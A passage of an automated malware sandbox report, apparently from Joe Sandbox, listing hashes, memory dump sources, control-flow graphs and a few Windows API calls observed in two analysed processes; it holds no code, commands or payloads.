                                                                                    • Opcode Fuzzy Hash: 2c8a3733e8af488a75a4cd3bf0e3c0b1184f6dd9f0d54d6cfeb38d661fa60b29
                                                                                    • Instruction Fuzzy Hash: 9431D56698D5E22EE71AB778F4920F53F50EF42279B1C91BAD0C84C053CE19644B8AA8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                    • API String ID: 0-1692736845
                                                                                    • Opcode ID: 6a5dbac14c5d11ddaec2a0c634106d08482b247298901b981f54d69e8ad9f73c
                                                                                    • Instruction ID: 9f798cc87b1f9d7a2e81fcf049149f913ebd09ac2b2a9ccfb6ae0af8183cbd58
                                                                                    • Opcode Fuzzy Hash: 6a5dbac14c5d11ddaec2a0c634106d08482b247298901b981f54d69e8ad9f73c
                                                                                    • Instruction Fuzzy Hash: 65418CD2ACA9237DE10E36FDB4021F96B44EF813B9F4C9677E04C890934F5960958AED

                                                                                    Execution Graph

                                                                                    Execution Coverage:2.9%
                                                                                    Dynamic/Decrypted Code Coverage:75%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:12
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 37187 7ff8490d0915 37188 7ff8490d092f GetFileAttributesW 37187->37188 37190 7ff8490d09f5 37188->37190 37199 7ff8490cea60 37200 7ff8490cea6a ResumeThread 37199->37200 37202 7ff8490ceb74 37200->37202 37191 7ff8490cd1fd 37192 7ff8490cd20b SuspendThread 37191->37192 37194 7ff8490cd2e4 37192->37194 37195 7ff8490cebc9 37196 7ff8490cebd7 CloseHandle 37195->37196 37198 7ff8490cecb4 37196->37198
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3394537061.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff848f20000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f787c6d5601e852e4e45fd1d28b259f923328153e797c3a23fe6baa40fa9d0c8
                                                                                    • Instruction ID: 1d4ff07b30387d0b0ef83e402ed4381861260f51176eeda41504998925918217
                                                                                    • Opcode Fuzzy Hash: f787c6d5601e852e4e45fd1d28b259f923328153e797c3a23fe6baa40fa9d0c8
                                                                                    • Instruction Fuzzy Hash: D9A1B9B1918A9A8FE784EB6CD8583AABFE1FF95350F0041BEC009D72D2DB791855CB50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 7ff8496309a8-7ff8496309aa 1 7ff8496309ac-7ff8496309f1 0->1 2 7ff8496309f5-7ff849630a8a 0->2 1->2 11 7ff849630a8c-7ff849630aca 2->11 12 7ff849630ad5-7ff849630aea 2->12 32 7ff849630b15-7ff849630b1a 11->32 38 7ff849630acc-7ff849630b0e 11->38 21 7ff849630aec-7ff849630b0e 12->21 22 7ff849630b35-7ff849630b64 12->22 21->32 34 7ff849630b65-7ff849630bda 22->34 33 7ff849630b1c-7ff849630b2e 32->33 32->34 33->22 56 7ff849630bdc-7ff849630c1a 34->56 57 7ff849630c25-7ff849630c64 34->57 38->32 71 7ff849630c1c-7ff849630c24 56->71 72 7ff849630c65-7ff849630d28 56->72 57->72 71->57 90 7ff849630d2a-7ff849630d5e 72->90 91 7ff849630d65-7ff849630d8a 72->91 90->91 99 7ff849630d8c-7ff849630dd1 91->99 100 7ff849630dd5-7ff849630dda 91->100 110 7ff849630e09-7ff849630e12 99->110 101 7ff849630ddc-7ff849630ddf 100->101 102 7ff849630e25-7ff849630e3a 100->102 101->110 119 7ff849630e3c-7ff849630e41 102->119 120 7ff849630e85-7ff849630e93 102->120 112 7ff849630e5d-7ff849630e68 110->112 113 7ff849630e14-7ff849630e22 110->113 121 7ff849639a10-7ff849639a46 112->121 122 7ff849630e6d-7ff849630e77 113->122 123 7ff849630e24 113->123 130 7ff849630e79-7ff849630e7e 119->130 132 7ff849630e43-7ff849630e4a 119->132 128 7ff849630e95-7ff849630ea4 120->128 140 7ff849639a47 121->140 122->130 123->102 139 7ff849630ea5-7ff849630eca 128->139 130->120 132->128 133 7ff849630e4c-7ff849630e5a 132->133 138 7ff849630e5c 133->138 133->139 138->112 144 7ff849630ecc-7ff849630f09 139->144 145 7ff849630f15-7ff849630f2a 139->145 140->140 152 7ff849630f81-7ff849630f91 144->152 147 7ff849630f2c-7ff849630f9f 145->147 148 7ff849630f75-7ff849630f7a 145->148 160 7ff849630fa1-7ff849630fa5 call 7ff84962c180 147->160 151 7ff849630fac-7ff849630fc3 148->151 154 7ff849630fc9-7ff849630fcd 151->154 154->121 156 7ff849630f7c-7ff849630f7d 154->156 156->152 162 7ff849630faa 160->162 162->148
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8^cI$`6wI
                                                                                    • API String ID: 0-3787090860
                                                                                    • Opcode ID: 648d3ba6c370ae34b9ff9df124e89c9f7ae8117ec8585e0352c347a569b7fbb3
                                                                                    • Instruction ID: 172a8b345297359528bb04616dbd638b98aec341736c5a574aefa2ce7b29bc1d
                                                                                    • Opcode Fuzzy Hash: 648d3ba6c370ae34b9ff9df124e89c9f7ae8117ec8585e0352c347a569b7fbb3
                                                                                    • Instruction Fuzzy Hash: EA224632C1F6D69FE375BF68A8650F67FA0EF12698B0801B7D08D8E093DE1D64498359

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: PlI$\^H
                                                                                    • API String ID: 0-1564205966
                                                                                    • Opcode ID: 6a3b122da551d9071ebfa4163f42d71bd36df28e943b5a729f7b22d0b5bd05c5
                                                                                    • Instruction ID: e65063dd90bd5bc587054aaca90d215888bb61fa4cf9433fb37551f445177a3d
                                                                                    • Opcode Fuzzy Hash: 6a3b122da551d9071ebfa4163f42d71bd36df28e943b5a729f7b22d0b5bd05c5
                                                                                    • Instruction Fuzzy Hash: 69A19F35E0DACA8FE7A5FF2888646B87BE1EF55341F4941FAC00DCB192DE2C98098751

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 232 7ff84962e542-7ff84962e549 233 7ff84962e54f-7ff84962e581 call 7ff84962e2e0 call 7ff84962e1b0 232->233 234 7ff84962e765-7ff84962e776 232->234 233->234 241 7ff84962e587-7ff84962e5d9 call 7ff84962e2e0 call 7ff84962e1b0 233->241 235 7ff84962e778 234->235 236 7ff84962e77d-7ff84962e788 234->236 235->236 241->234 248 7ff84962e5df-7ff84962e624 call 7ff84962e2e0 241->248 254 7ff84962e626-7ff84962e63a call 7ff84962e1b0 248->254 255 7ff84962e694-7ff84962e6d0 call 7ff8496299f0 248->255 254->234 260 7ff84962e640-7ff84962e663 call 7ff84962e2e0 254->260 265 7ff84962e709-7ff84962e710 call 7ff849628a20 255->265 266 7ff84962e669-7ff84962e679 260->266 267 7ff84962e835-7ff84962e84c 260->267 271 7ff84962e715-7ff84962e71a 265->271 266->267 269 7ff84962e67f-7ff84962e692 266->269 272 7ff84962e84e 267->272 273 7ff84962e84f-7ff84962e85d 267->273 269->254 269->255 274 7ff84962e71c-7ff84962e71e 271->274 275 7ff84962e6d2-7ff84962e6f2 271->275 272->273 277 7ff84962e85f 273->277 278 7ff84962e865 273->278 274->234 279 7ff84962e720-7ff84962e723 274->279 275->267 276 7ff84962e6f8-7ff84962e703 275->276 276->265 280 7ff84962e7eb-7ff84962e7ff 276->280 277->278 281 7ff84962e869-7ff84962e87a 278->281 282 7ff84962e867 278->282 283 7ff84962e729-7ff84962e744 279->283 284 7ff84962e725 279->284 288 7ff84962e801 280->288 289 7ff84962e806-7ff84962e811 280->289 286 7ff84962e87c-7ff84962e8a8 281->286 287 7ff84962e8c5-7ff84962e8cf 281->287 282->281 285 7ff84962e8a9 282->285 283->267 290 7ff84962e74a-7ff84962e763 call 7ff84962e1b0 283->290 284->283 292 7ff84962e8aa-7ff84962eaea 285->292 286->285 286->292 294 7ff84962eaef-7ff84962eaf2 287->294 295 7ff84962e8d5-7ff84962e8da 287->295 288->289 290->234 303 7ff84962e789-7ff84962e7a2 call 7ff84962e2e0 290->303 296 7ff84962eaf3-7ff84962eaf5 294->296 297 7ff84962e8e0-7ff84962eb29 295->297 298 7ff84962e9e6 295->298 301 7ff84962ea0f-7ff84962ea16 298->301 306 7ff84962e9e8-7ff84962ea01 301->306 307 7ff84962ea18-7ff84962ea33 call 7ff8496299f0 301->307 303->267 313 7ff84962e7a8-7ff84962e7af 303->313 310 7ff84962ea07-7ff84962ea0c 306->310 311 7ff84962eb75-7ff84962eb85 306->311 317 7ff84962ea38-7ff84962ea63 307->317 310->301 318 7ff84962eb88-7ff84962eb9a 311->318 319 7ff84962eb87 311->319 316 7ff84962e7d9-7ff84962e7e1 313->316 320 7ff84962e7e3-7ff84962e7e9 316->320 321 7ff84962e7b1-7ff84962e7cd 316->321 334 7ff84962ea8c-7ff84962ea92 317->334 323 7ff84962eb9c-7ff84962ebd7 318->323 324 7ff84962ebe5-7ff84962ec3b 318->324 319->318 320->280 326 7ff84962e812 320->326 321->267 325 7ff84962e7cf-7ff84962e7d7 321->325 323->324 333 7ff84962ec40-7ff84962ec47 324->333 325->316 326->267 333->333 336 7ff84962ec49-7ff84962efd6 333->336 337 7ff84962ea99-7ff84962ea9f 334->337 340 7ff84962eaa1-7ff84962eaa6 337->340 341 7ff84962ea65-7ff84962ea7e 337->341 343 7ff84962eaac-7ff84962eab7 340->343 344 7ff84962e993 340->344 341->311 342 7ff84962ea84-7ff84962ea89 341->342 342->334 343->296 349 7ff84962eab9-7ff84962eae1 call 7ff8496299f0 343->349 346 7ff84962e9c1-7ff84962e9d8 344->346 346->337 348 7ff84962e9de-7ff84962e9e4 346->348 348->298 350 7ff84962e995 348->350 350->346 352 7ff84962eb68-7ff84962eb6d 350->352 352->311
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: 3886531f680199845e5314f3ec6b4447abaf1b96f09b1460e7266f7eeeb9c4bd
                                                                                    • Instruction ID: 9a82542aef454b4f29387b1c505608b6bf9bbe0d458c24edd8a9f6dcf5ad812d
                                                                                    • Opcode Fuzzy Hash: 3886531f680199845e5314f3ec6b4447abaf1b96f09b1460e7266f7eeeb9c4bd
                                                                                    • Instruction Fuzzy Hash: F412A330D1CA8A9FE76AFF68C4596B9BBA0FF55340F14417AD44EC7682DB38A841CB50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 355 7ff84962fcc2-7ff84962fcc4 357 7ff84962fd0e-7ff84962fd30 355->357 358 7ff84962fcc6-7ff84962fea5 355->358 360 7ff84962feaa-7ff84962fec5 357->360 361 7ff84962fd36-7ff84962fd4b 357->361 367 7ff84962fecd 360->367 368 7ff84962fec7 360->368 361->360 362 7ff84962fd51-7ff84962fd5d 361->362 364 7ff84962fd8e-7ff84962fda4 call 7ff84962f6a0 362->364 365 7ff84962fd5f-7ff84962fd76 call 7ff84962e1b0 362->365 374 7ff84962fe03-7ff84962fe14 364->374 375 7ff84962fda6-7ff84962fdb1 364->375 365->374 379 7ff84962fd7c-7ff84962fd8b call 7ff84962e2e0 365->379 371 7ff84962fecf 367->371 372 7ff84962fed1-7ff84962feda 367->372 368->367 371->372 376 7ff84962ff11-7ff84962ff13 371->376 377 7ff84962fedc-7ff84962ff33 372->377 378 7ff84962ff25-7ff84962ff30 372->378 383 7ff84962fe1b-7ff84962fe26 374->383 384 7ff84962fe16 374->384 375->360 380 7ff84962fdb7-7ff84962fdcc 375->380 381 7ff84962ff5e-7ff84962ff7a 376->381 382 7ff84962ff15-7ff84962ff21 376->382 405 7ff84962fefb-7ff84962ff37 377->405 406 7ff84962ff3e-7ff84962ff5c 377->406 379->364 380->360 387 7ff84962fdd2-7ff84962fde5 380->387 396 7ff84962ff7c-7ff84962ff90 381->396 397 7ff84962ffc5-7ff84962ffd0 381->397 382->378 384->383 391 7ff84962fe39-7ff84962fe44 call 7ff8496280d8 387->391 392 7ff84962fde7-7ff84962fe01 call 7ff84962e1b0 387->392 399 7ff84962fe49-7ff84962fe4c 391->399 392->374 410 7ff84962fe27-7ff84962fe36 call 7ff84962e2e0 392->410 408 7ff849630078-7ff84963007d 396->408 403 7ff84963005d-7ff849630075 397->403 404 7ff84962ffd6-7ff84962ffd9 397->404 407 7ff84962fe53-7ff84962fe5b 399->407 403->408 404->403 411 7ff84962ffdf-7ff84962ffe2 404->411 405->376 413 7ff84962fc9a-7ff84962fca7 407->413 414 7ff84962fe61-7ff84962fe75 407->414 436 7ff84962ffac-7ff849630087 408->436 437 7ff849630091-7ff8496300af 408->437 410->391 418 7ff84963004b-7ff849630052 411->418 419 7ff84962ffe4-7ff849630011 411->419 413->407 420 7ff84962fcad-7ff84962fcc1 413->420 425 7ff84962fe7c-7ff84962fe87 414->425 426 7ff84962fe77 414->426 421 7ff849630012-7ff84963002c 418->421 422 7ff849630054-7ff84963005c 418->422 420->355 430 7ff849630032-7ff84963003d 421->430 431 7ff8496300b1-7ff8496300da 421->431 426->425 430->431 435 7ff84963003f-7ff849630049 430->435 446 7ff8496300dc-7ff849630101 call 7ff84962ac70 431->446 447 7ff849630125-7ff8496301ce 431->447 435->418 436->397 446->447 460 7ff8496300f3-7ff8496300f8 446->460 468 7ff849630190-7ff849630193 call 7ff8496301d5 447->468 469 7ff849630166-7ff84963018e call 7ff8496301d5 447->469 473 7ff849630198 468->473 480 7ff8496301a6-7ff8496301af 469->480 475 7ff8496301d0-7ff8496301d3 473->475 477 7ff84963019a call 7ff849627260 475->477 481 7ff84963019f-7ff8496301a5 477->481 481->480
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HtbI
                                                                                    • API String ID: 0-1960288083
                                                                                    • Opcode ID: a94eaafdeaba3d2a79d43fa3bfed1fbb8aa5517b6bb6a9405f0199965f787a78
                                                                                    • Instruction ID: 2408fc2b4bcfbc815a735521fad2432e070b8c123b6f97a1fefef8cd77305152
                                                                                    • Opcode Fuzzy Hash: a94eaafdeaba3d2a79d43fa3bfed1fbb8aa5517b6bb6a9405f0199965f787a78
                                                                                    • Instruction Fuzzy Hash: 3E02D030A5DA8A8FE379FF28D4905B977E0FF45380B54057EC48EC7686DB29B8468B41

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 482 7ff8490cea60-7ff8490cea99 484 7ff8490cea9c-7ff8490ceb72 ResumeThread 482->484 485 7ff8490cea9b 482->485 489 7ff8490ceb74 484->489 490 7ff8490ceb7a-7ff8490cebc4 484->490 485->484 489->490
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3398069146.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff8490c0000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: 4440b9fca93dee43d99ac15c0c72a1c9c9925ebd855cd9a46a8c6b54a6b86ce4
                                                                                    • Instruction ID: 9a065a1edecfa713ab018a3b6cdac50479818929f73790221a6d4d3baacc9a6f
                                                                                    • Opcode Fuzzy Hash: 4440b9fca93dee43d99ac15c0c72a1c9c9925ebd855cd9a46a8c6b54a6b86ce4
                                                                                    • Instruction Fuzzy Hash: 37517C7090D78C8FDB59DFA8C858AE9BFF0EF56310F0441ABD049D7252CA79A846CB11

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 493 7ff8490cd1fd-7ff8490cd209 494 7ff8490cd214-7ff8490cd2e2 SuspendThread 493->494 495 7ff8490cd20b-7ff8490cd213 493->495 499 7ff8490cd2e4 494->499 500 7ff8490cd2ea-7ff8490cd334 494->500 495->494 499->500
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3398069146.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff8490c0000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID: SuspendThread
                                                                                    • String ID:
                                                                                    • API String ID: 3178671153-0
                                                                                    • Opcode ID: b3a00483c1683e00a38fb35b0e2b9fc5e68c7d5b6559266c763a14c23809b6fc
                                                                                    • Instruction ID: b5f0e6ce96a49fd185eb0a6ed9b4aeaddb4db48d7cac1a813b1624ce9d70519b
                                                                                    • Opcode Fuzzy Hash: b3a00483c1683e00a38fb35b0e2b9fc5e68c7d5b6559266c763a14c23809b6fc
                                                                                    • Instruction Fuzzy Hash: 18412A70D0864D8FDB58DF98D885AADBBF0FB5A310F10416AD049E7252DB74A885CB45

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 503 7ff8490d0915-7ff8490d09f3 GetFileAttributesW 507 7ff8490d09f5 503->507 508 7ff8490d09fb-7ff8490d0a39 503->508 507->508
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3398069146.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff8490c0000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: a70208a3f6885741f54831d46b35889b8bb970050a5aa909cd03cc49e2bd0c3e
                                                                                    • Instruction ID: df51b25a5382804e78af61bb34bdf9f71a3e5f161967c29ff04a1f010c1be989
                                                                                    • Opcode Fuzzy Hash: a70208a3f6885741f54831d46b35889b8bb970050a5aa909cd03cc49e2bd0c3e
                                                                                    • Instruction Fuzzy Hash: 0541197090865C8FDB98EF98D889BEDBBF0FB59310F10416ED04DE7252DA74A885CB54

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H{uI
                                                                                    • API String ID: 0-2047368440
                                                                                    • Opcode ID: b65dd62ea32a3ba9cadaff0196e29b09f4b1f07655ccd17c3a56ec2c82681e38
                                                                                    • Instruction ID: ae53f84f88657c8ac0e208b83f9abfa92873dd440d91cb0ad61ebf0f7befca2f
                                                                                    • Opcode Fuzzy Hash: b65dd62ea32a3ba9cadaff0196e29b09f4b1f07655ccd17c3a56ec2c82681e38
                                                                                    • Instruction Fuzzy Hash: 89712171C1CA8E9FE760FFA8D8466FE7BB0FF44390F1401BAD049D7192EA2868458790

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 550 7ff84962064b-7ff849620653 551 7ff8496205ed-7ff849620619 550->551 552 7ff849620655-7ff84962065c 550->552 560 7ff849620621 551->560 554 7ff84962065e-7ff849620663 552->554 556 7ff8496206d2-7ff849620781 554->556 557 7ff849620665-7ff849620698 554->557 569 7ff84962079a-7ff8496207d3 556->569 570 7ff8496206f4-7ff849620795 556->570 557->556 576 7ff84962081d 569->576 577 7ff8496207d5-7ff84962082e 569->577 570->556 582 7ff849620720-7ff849620724 570->582 579 7ff84962081e-7ff849620eab 576->579 577->579 582->554 584 7ff84962072a-7ff84962072f 582->584 584->556 586 7ff849620731-7ff849620737 584->586
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: X;`I
                                                                                    • API String ID: 0-1832804531
                                                                                    • Opcode ID: 5e512ac0e4cf56c804f09fc904662c0b2e40e2531d2c2178a1ad23513a6201f7
                                                                                    • Instruction ID: 3d1f9d2cb941b4a381ae800234d9a2b00c4dd7f5f4f250018f8d68a469e0717c
                                                                                    • Opcode Fuzzy Hash: 5e512ac0e4cf56c804f09fc904662c0b2e40e2531d2c2178a1ad23513a6201f7
                                                                                    • Instruction Fuzzy Hash: 9161E130D1D68E9FEB69FF6488546BDBBA1FF59380F1404BAD00ED7182EE296841CB51

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 592 7ff8496228e8-7ff849622900 594 7ff849622908-7ff849622933 592->594 598 7ff84962295c-7ff849622962 594->598 599 7ff849622969-7ff84962296f 598->599 600 7ff849622971-7ff849622976 599->600 601 7ff849622935-7ff84962294e 599->601 604 7ff84962297c-7ff8496229b1 600->604 605 7ff849622863-7ff8496228a8 600->605 602 7ff849622a45-7ff849622a55 601->602 603 7ff849622954-7ff849622959 601->603 610 7ff849622a58-7ff849622aa6 602->610 611 7ff849622a57 602->611 603->598 605->599 609 7ff8496228ae-7ff8496228b4 605->609 612 7ff849622865-7ff849622a3d 609->612 613 7ff8496228b6 609->613 611->610 612->602 617 7ff8496228df-7ff8496228e6 613->617 617->592 619 7ff8496228b8-7ff8496228d1 617->619 619->602 621 7ff8496228d7-7ff8496228dc 619->621 621->617
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: c97d91a498b2393869562999bf7e620aef845549adea3d8b024c93c05c347bd9
                                                                                    • Instruction ID: 03e3b4ebc9f3b202e8e792ec54055c37327271101c51635df53d5f901ccc4806
                                                                                    • Opcode Fuzzy Hash: c97d91a498b2393869562999bf7e620aef845549adea3d8b024c93c05c347bd9
                                                                                    • Instruction Fuzzy Hash: 25515B30D0C68A9FDB6DEFA8C4A55BDB7B1FF58340F1444BAC00AE7286DA386945CB51

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 624 7ff8490cebc9-7ff8490cebd5 625 7ff8490cebd7-7ff8490cebdf 624->625 626 7ff8490cebe0-7ff8490cebe9 624->626 625->626 627 7ff8490cec24-7ff8490cecb2 CloseHandle 626->627 628 7ff8490cebeb-7ff8490cec23 626->628 632 7ff8490cecb4 627->632 633 7ff8490cecba-7ff8490ced0e 627->633 628->627 632->633
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3398069146.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff8490c0000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    • Opcode ID: 1cdbbf0d9ab732c929d636e5620bec61523cf803b43734b845f96d6bdf660152
                                                                                    • Instruction ID: 0c5d71e2dc556598a4b87e1a1802be80e483f2034affb7f84c184be1f74dbb2c
                                                                                    • Opcode Fuzzy Hash: 1cdbbf0d9ab732c929d636e5620bec61523cf803b43734b845f96d6bdf660152
                                                                                    • Instruction Fuzzy Hash: 7A416C70D0865C8FDB58DFA8D889BEDBBF0FB56311F1041AAD049E7292DA34A885CB01

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: 58ea7a75cf58478dfe791b384f6916706bb5dcb8a94649d91916f56411e3811d
                                                                                    • Instruction ID: 05e8f303e781e3e4b68aba75416f0da9a5dab89b228d736c7d13db772c0089c9
                                                                                    • Opcode Fuzzy Hash: 58ea7a75cf58478dfe791b384f6916706bb5dcb8a94649d91916f56411e3811d
                                                                                    • Instruction Fuzzy Hash: BE416D30D0D59A9FDB6AEFA8C4595BDBBB1FF54341F0441BAC00AE7292CA386905CB50

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H{uI
                                                                                    • API String ID: 0-2047368440
                                                                                    • Opcode ID: c7410bac060df87b8d114a9ca0323139149ad5dace8fc44e8c5d39f5c53fc0fd
                                                                                    • Instruction ID: a779033d965441473872c76602d9327e0fbbb0fbd13a84c7f83a49ed87522f34
                                                                                    • Opcode Fuzzy Hash: c7410bac060df87b8d114a9ca0323139149ad5dace8fc44e8c5d39f5c53fc0fd
                                                                                    • Instruction Fuzzy Hash: 52313975D1C89A9EEBA4FF5894855BEBBB1FF58390F6000B5D00AE3295DE3868418740

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H{uI
                                                                                    • API String ID: 0-2047368440
                                                                                    • Opcode ID: c58afd42bb2541a772456c72071b77fc09a3a1f5842e3c36f2fb04631cb12eab
                                                                                    • Instruction ID: b548f203da6051da1bdc21ca5289efd7e4f18e9834729622bc38a0b18f46632a
                                                                                    • Opcode Fuzzy Hash: c58afd42bb2541a772456c72071b77fc09a3a1f5842e3c36f2fb04631cb12eab
                                                                                    • Instruction Fuzzy Hash: 03314975D1C95E9EEBA4FF98C8415FEBBB1FF98390F500075D10AE2295DE3868418780

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 739 7ff848f21e9c-7ff848f21ec4 call 7ff848f20c50 742 7ff848f21ec9 739->742
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3394537061.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff848f20000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0
                                                                                    • API String ID: 0-4108050209
